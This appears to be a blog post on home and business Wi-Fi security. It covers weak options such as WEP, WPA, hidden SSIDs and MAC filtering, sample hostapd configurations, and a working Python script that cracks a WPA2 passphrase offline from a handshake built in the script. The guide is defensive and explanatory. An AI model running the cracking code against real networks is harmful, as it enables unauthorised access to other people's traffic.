One of the weakest points of personal home security is Wi-Fi. At the time of writing there has also been no new Wi-Fi security standard since 2004’s 802.11i (the basis of WPA2). Unfortunately, routers sold today still offer security settings that are dangerously antiquated even compared to that. As with all things in security, attacks only get better.
The article on Wi-Fi security standards above lists most of the standards and defenses. For simplicity’s sake, we will quickly go through those that should not be used at all.
- WEP-based encryption is so easily broken that at this point it should be considered only marginally better than having no protection at all: its reuse of RC4 keystreams lets an attacker who captures a few tens of thousands of packets recover the key in minutes with freely available tools. Here is an example of how to break WEP-based security.
- WPA, while offering a substantial improvement over WEP, is also considered insecure because of the algorithms involved: its TKIP protocol was designed as a stopgap to run on WEP-era hardware and still wraps the RC4 cipher, and practical attacks against TKIP have been published.
- Hiding your SSID (the name of your wireless network) is sometimes used. I personally turned it on for a short time, but it is problematic for two reasons. First, the name is only removed from beacons; it still appears in probe responses and association frames, and your clients will broadcast probe requests for the hidden name wherever they go, so anyone listening learns it as soon as a device connects. Second, hiding the SSID relies on behaviour the 802.11 standard does not define, and any time that happens with technology there can be interoperability concerns.
- Filtering based on MAC address also offers minimal help, because changing a wireless device’s MAC address is a one-line command. An attacker can simply listen to traffic to see which addresses are already associated, then clone one of them.
With those dealt with, we can look at options that should be considered.
- WPA2 Personal (WPA2-PSK with AES-CCMP, not TKIP) is the minimum that should be used for any network.
- If you are running a business network, you should be using WPA2 Enterprise (802.1X authentication against a RADIUS server). It gives each user their own credentials, lets you know which users are on which devices, and gives you a central place to investigate from if suspicious activity is detected. It also lets you revoke a single user’s credentials (for example their certificate) without changing a shared password on several access points.
- Hardware tokens, smart cards, and similar tools (such as RSA SecurID) can be added in some environments, with extensive work, to provide rotating, per-user credentials. If your needs justify this, however, you should have full-time staff working to implement and administer the solution.
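The choices above, expressed as hostapd access-point settings. This is an added example, not configuration from the original post: the interface name, SSID, passphrases, RADIUS address and shared secret are placeholders, and the first fragment is included only to show the settings the list above says not to rely on.

```ini
# hostapd.conf (WEAK - the options the list above rejects; shown for contrast)
interface=wlan0
hw_mode=g
channel=6
ssid=HomeNet
# wpa=1 selects WPA (TKIP/RC4) only
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
# dictionary word: falls to an offline attack on one captured handshake
wpa_passphrase=sunshine1
# "hidden" SSID: still leaks in probe and association frames
ignore_broadcast_ssid=1
# MAC allow-list: any associated address can be cloned
macaddr_acl=1
accept_mac_file=/etc/hostapd.accept

# hostapd.conf (WPA2 Personal, the minimum for a home network)
interface=wlan0
hw_mode=g
channel=6
ssid=HomeNet
# wpa=2 selects WPA2 (RSN) only; rsn_pairwise=CCMP forbids TKIP
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
# long, random passphrase (8-63 characters); placeholder value
wpa_passphrase=vp7-Quartz-meadow-ledger-91-Helium
ignore_broadcast_ssid=0
macaddr_acl=0

# hostapd.conf (WPA2 Enterprise: per-user credentials via 802.1X/RADIUS)
interface=wlan0
hw_mode=g
channel=6
ssid=CorpNet
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
ieee8021x=1
# RADIUS server address and secret are placeholders (TEST-NET-1 range)
auth_server_addr=192.0.2.10
auth_server_port=1812
auth_server_shared_secret=change-me-radius-secret
```

hostapd does not strip trailing comments, so the comments are on their own lines. The Enterprise fragment only points hostapd at a RADIUS server; issuing and revoking the per-user certificates or passwords happens on that server, which is exactly why a single user can be cut off without touching the access points.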
Additional layers can and should be added on top of whichever choice you make above, for example SSH tunnels or VPN access. That way an attacker who breaks the Wi-Fi layer still has to defeat a second layer of encryption before any traffic can be read.
While all of these help, none of them guarantees safety. There is at least one known weakness in WPA2, known as Hole196: because every client shares the same group key for broadcast traffic, an authorised user of the same network can forge broadcast frames from the access point (for instance to redirect other clients’ traffic through their own machine) or create a denial-of-service condition. There are also tools for gaining illicit access to a Wi-Fi network. Cracking a WPA2 passphrase means capturing one client’s four-way handshake and then guessing offline; how long that takes depends entirely on the passphrase’s strength, from hours for a dictionary word to effectively forever for a long random one, and given that passphrases often remain unchanged for years an attacker can afford to wait.
In the event that your paranoia has been justifiably switched on (for instance you are concerned about state-level actors or targeted penetration attempts)…why are you even enabling Wi-Fi? While you could use RF-shielding paint or a Faraday cage to confine your signal to a certain physical area with some level of certainty, going wired-only, with the other security measures enabled, is your best choice.
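The offline attack described above, as an added example that is not part of the original post: it derives the WPA2 pre-shared key and pairwise keys exactly as 802.11i specifies and then checks candidate passphrases against the MIC of a captured handshake message. The handshake is constructed in-process (the code plays both access point and client), and the SSID, MAC addresses, passphrases and EAPOL frame body are made-up placeholders.

```python
"""Offline dictionary attack on a captured WPA2-PSK four-way handshake.

Added example, not code from the original post. The "captured" handshake is
constructed locally, so this runs offline; SSID, MACs and passphrases are made up.
"""
import hashlib
import hmac
import os


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    The 4096 iterations make every guess cost thousands of SHA-1 calls, and the
    SSID as salt stops one precomputed table from covering every network.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    blocks = [
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    ]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key from the PMK plus the material visible on the air."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP MIC: first 16 bytes of HMAC-SHA1(KCK, EAPOL-Key frame with MIC zeroed)."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def capture_handshake(passphrase: str, ssid: str) -> dict:
    """Build what a passive sniffer sees: both MACs, both nonces, message 2 of the
    handshake with its MIC field zeroed, and the MIC the client actually sent.
    The MAC addresses and frame body are constructed placeholders."""
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("66778899aabb")
    anonce, snonce = os.urandom(32), os.urandom(32)
    # Stand-in for the EAPOL-Key message 2 body (key info, replay counter, SNonce,
    # zeroed MIC field and trailing data); only its bytes matter to the MIC.
    eapol_msg2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 8 + snonce + b"\x00" * 72
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {
        "ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
        "anonce": anonce, "snonce": snonce,
        "eapol_msg2": eapol_msg2, "mic": eapol_mic(kck, eapol_msg2),
    }


def crack_psk(hs: dict, wordlist):
    """Return the candidate whose derived KCK reproduces the captured MIC, else None.

    Each guess costs one full PBKDF2 run, which is why a dictionary word falls
    in hours and a long random passphrase does not fall at all.
    """
    for guess in wordlist:
        pmk = derive_pmk(guess, hs["ssid"])
        kck = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol_msg2"]), hs["mic"]):
            return guess
    return None


if __name__ == "__main__":
    captured = capture_handshake("sunshine1", "HomeNet")
    print(crack_psk(captured, ["letmein", "password", "sunshine1"]))
```

Only message 2 (or 3) of the handshake is needed because it carries a MIC computed with a key derived from the passphrase; nothing in the attack needs to be sent to the network, which is why changing the passphrase years later is the only thing that invalidates a capture.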